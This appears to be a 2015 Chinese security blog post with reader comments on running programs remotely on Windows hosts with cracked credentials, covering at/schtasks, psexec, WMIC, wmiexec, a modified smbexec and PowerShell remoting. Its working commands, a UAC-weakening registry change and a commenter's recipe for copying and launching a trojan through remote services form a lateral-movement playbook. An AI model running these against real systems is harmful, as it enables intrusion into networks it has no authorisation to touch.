在远程系统上执行程序的技术整理

三好学生 2015-07-24 17:41:00

0x00 前言


上一篇学习了如何导出域内所有用户hash,那么,接下来准备用破解出的用户名口令尝试远程登陆目标主机并执行程序,结合实际环境做了如下测试.

0x01 目标


远程登陆目标主机执行测试程序

0x02 测试环境


远程主机:

ip:192.168.40.137   
用户名:test
口令:testtest
操作系统:win7 x64

远程登陆方式:

net use远程登陆,不使用3389

Tips:

解决工作组环境无法远程登陆执行程序的方法:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System add a new DWORD (32-bit) called “LocalAccountTokenFilterPolicy” and set it to 1

0x03 测试方法


1、at&schtasks

计划任务方式执行程序。

条件:

启动Task Scheduler服务  

2、psexec

PsTools工具之一,在指定的一台或多台计算机上运行应用程序

条件:

需要开放ADMIN$共享

3、WMIC

功能强大,可做系统管理、远程主机信息获取

条件:

启动WMI服务,开放135端口
本地安全策略的“网络访问: 本地帐户的共享和安全模式”应设为“经典-本地用户以自己的身份验证”

4、wmiexec

使用VBS脚本调用WMI来模拟psexec的功能,基本上psexec能用的地方,这个脚本也能够使用。

条件:

启动WMI服务,开放135端口
本地安全策略的“网络访问: 本地帐户的共享和安全模式”应设为“经典-本地用户以自己的身份验证”

0x04 实际测试


使用用户名口令远程登陆192.168.40.137,如图1

查看目标主机共享资源,如图1-2

1、at&schtasks

at \\192.168.40.137

找不到网络路径,判断是目标主机已禁用Task Scheduler服务

如图2

2、psexec

PsExec.exe \\192.168.40.137 /accepteula -u test -p testtest -c c:\runtest\calc.exe

找不到网络名,判断目标主机已禁用ADMIN$共享

如图3

3、WMIC

wmic /node:192.168.40.137 /user:test /password:testtest process call create calc.exe

Description = 无法启动服务,原因可能是已被禁用或与其相关联的设备没有启动,判断WMI服务被禁用

如图4

4、wmiexec

cscript.exe wmiexec.vbs /cmd 192.168.40.137 test testtest "ipconfig"

WMIEXEC ERROR: 无法启动服务,原因可能是已被禁用或与其相关联的设备没有启动,判断WMI服务被禁用

如图5

0x05 分析


整理下目前掌握的目标主机信息:

目标主机:

1已获得登陆用户名及口令
2可以net use连接
3开放共享C

但是:

1默认admin$共享关闭无法使用psexec
2Task scheduler关闭无法使用atschtasks
3Windows Management Instrumentation服务关闭,关闭135端口无法使用wmicwmiexec
4不支持3389

那么,如何在目标主机远程执行程序?

猜测管理员应该是对常用的远程执行程序的方法做了限制,就在一筹莫展的时候突然想到了smbexec,它是基于psexec,如果目标主机开放了其他默认共享,倒是可以尝试smbexec

于是搜索smbexec,终于在GitHub上面找到了一个smbexec的c++参考资料,作为工具改进模版

模版下载地址:

https://github.com/sunorr/smbexec

0x06 改进方案


模版中的bug不细讲,最终我成功用vc6实现了psexec的功能,同时也做了一些改进:

1、可指定默认共享名

为了完成上述测试,加入了参数来指定默认共享,如果ADMIN$共享关闭,那么可以尝试其他磁盘的默认共享

2、分离安装服务的功能

在实际测试过程中,如果ADMIN$共享关闭,c$共享开启,因为UAC的缘故,注册安装服务的功能会出现bug,采取的解决办法为将实现注册安装服务功能的exe单独上传至c:\windows下, 即可解决权限不够的问题

0x07 方案测试


1、工具说明

文件说明:

test.exe:主程序
execserver.exe:实现注册安装服务的辅助程序

参数说明:

test.exe ip user password command netshare

eg:

test.exe 192.168.40.137 test testtest whoami c$

2、使用流程

(1)上传execserver.exe至c:\windows

copy execserver.exe \\192.168.40.137\c$\windows

(2)远程执行

test.exe 192.168.40.137 test testtest whoami c$

如图6

最终我们通过改造的smbexec,突破目标主机限制,成功远程执行程序。

程序源码下载链接:

smbexec_source.zip

0x08 补充


1、powershell remoting

实现在目标主机远程执行程序后,可对目标主机开放powershell remoting,用作远程连接

条件:

远程连接会有痕迹
本机要开启winRM服务

命令汇总:

列出所有远程信任主机

powershell Get-Item WSMan:\localhost\Client\TrustedHosts

设置信任所有主机

powershell Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force 

设置允许运行ps1文件

powershell Set-ExecutionPolicy Unrestricted 

执行test.ps1文件

powershell -ExecutionPolicy Bypass -File test.ps1 

ps1文件如下:

$UserName = "test" 
$serverpass = "testtest" $Password = ConvertTo-SecureString $serverpass -AsPlainText –Force $cred = New-Object System.Management.Automation.PSCredential($UserName,$Password)  
invoke-command -ComputerName 192.168.40.137 -Credential $cred -ScriptBlock { ipconfig }

2、python smbexec

随后用python写的smbexec也实现了相同的功能,但py2exe的时候遇到了大麻烦,如果有更简单的方法, 希望能得到你的帮助。

0x09 小结


这篇文章共列举了六种远程执行程序的方法,如果已经成功登陆目标主机,却无法执行程序,最心塞的事情莫过于此。

at 
psexec 
WMIC 
wmiexec 
smbexec 
powershell remoting
...

获得用户名口令,实现远程执行程序仅仅是个开始,内网渗透会很有趣。

水平有限,欢迎补充。

评论

L

luom 2015-07-25 12:48:47

SCHTASKS
SC

浮生 2015-07-25 22:16:17

thanks ! wmiexec用的最多,因为没有痕迹
789很好,
python倒是不常用,power脚本写的不太好
smbexec倒是不错

S

s!lly3r 2015-07-26 13:08:27

@浮生
自己做个测试观察下 其实wmi日志最多 因为一次只能执行一个命令 也就是说执行一次命令都会登陆和注销一次

小表哥 2015-07-29 15:04:28

问一下win2003用NTscan猜测出了口令,但是连net use都提示找不到网络路径,但是换另一台就可以 at 都可以。 这个要求本机什么特殊设置?

三好学生 2015-07-29 15:27:56

@小表哥 你的问题描述不完整,net
use不可以的那台主机可以登陆其他系统吗?

三好学生 2015-07-29 15:31:41

补充一种远程执行程序的方法:
利用服务sc工具启动程序:
1、系统权限
sc \\10.1.1.1 create winnt binpath= c:\cmd.exe
sc \\10.1.1.1 start winnt
sc \\10.1.1.1 delete winnt
2.指定用户权限启动
sc \\10.1.1.1 create adminsec binpath = “c:\pass.exe” obj= “adminsec\administrator” passwrod= adminsec
sc \\10.1.1.1 start adminsec

蒙塔基的钢弹 2015-07-29 21:09:03

一看就是内网渗透高手~!~

_

_Evil 2015-08-05 10:11:39

copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件
WMIC远程运行命令
wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”
schtasks计划任务远程运行
schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System schtasks /run /tn foobar /S host schtasks /F /delete /tn foobar /S host ##清除schtasks
SC添加服务远程运行命令
sc \\host create foobar binpath=“c:\windows\temp\foobar.exe” ##新建服务,指向拷贝的木马路径 sc \\host start foobar ##启动建立的服务 sc \\host delete foobar ##完事后删除服务

三好学生 2015-08-06 10:38:56

@_Evil 感谢补充schtasks

三好学生

good in study,attitude and health

twitter weibo github wechat

随机分类

无线安全 文章:27 篇
安全开发 文章:83 篇
硬件与物联网 文章:40 篇
XSS 文章:34 篇
MongoDB安全 文章:3 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录